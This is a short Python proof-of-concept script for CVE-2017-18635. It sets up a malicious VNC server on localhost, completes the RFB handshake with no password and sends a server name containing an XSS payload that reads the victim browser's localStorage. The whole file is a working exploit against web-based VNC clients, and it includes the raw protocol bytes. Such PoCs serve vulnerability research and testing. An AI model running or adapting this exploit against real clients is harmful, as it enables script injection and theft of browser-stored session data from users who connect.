cve-2017-18635.py

import socket
import sys
from binascii import unhexlify as unhex, hexlify as hex
from time import sleep

def comunicate(conn, payload):
    # print('Sent {}'.format(payload))
    conn.send(unhex(payload))
    data = conn.recv(1024)
    # print('Received {}'.format(data))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.bind(('127.0.0.1', 5902))
except socket.error as msg:
    print('Bind failed. Error Code : {}. Message: {}'.format(msg.errno, msg.strerror))
    sys.exit()
s.listen(10)
print('Server started')

while 1:
    conn, addr = s.accept()
    print('Connected with ' + addr[0] + ':' + str(addr[1]))

    print('Sending version info')
    comunicate(conn, '524642203030332e3030380a')

    print('Handshake')
    comunicate(conn, '0101') # no password

    print('Starting the vnc dance')
    comunicate(conn, '00000000')

    print('Sending server-name with XSS injection')
    xss = b'<img onerror=alert(JSON.stringify(localStorage)) src=# />'
    comunicate(conn, '040003002018000100ff00ff00ff100800000000000000{:02x}{}'.format(len(xss), hex(xss).decode()))

    sleep(30)
    print('Quitting')
    conn.close()

s.close()